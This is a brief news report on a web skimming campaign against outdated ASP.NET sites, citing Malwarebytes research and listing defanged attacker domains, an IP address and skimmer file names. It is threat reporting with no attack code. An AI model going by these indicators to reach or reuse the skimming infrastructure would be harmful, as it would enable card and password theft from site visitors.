A credit card-skimming scheme tracked since April and targeting at least a dozen websites – all hosted on Microsoft IIS servers running the ASP.NET web application framework – counts among its victims sports organizations, health and community associations, and a credit union.
The hackers apparently exploited an old version of ASP.NET (4.0.30319) that Microsoft no longer supports and is known to have vulnerabilities.
While not as popular as .php, ASP.NET retains a sizable market share that includes smaller business websites and personal blogs that include an e-commerce component. Malwarebytes believes the skimming campaign likely began sometime in April 2020 as the first domain (hivnd[.]net) part of its infrastructure (31.220.60[.]108) was registered on April 10 by a threat actor using a ProtonMail email address.
In a few instances, the skimmer was loaded remotely, explains Malwarebytes, providing a screenshot of a legitimate library where malicious code was appended and obfuscated. It loaded the skimmer from the remote domain thxrq[.]com. The actual file may be named element_main.js, gmt.js, or some other variation.
The skimmer not only looks for credit card numbers but also passwords.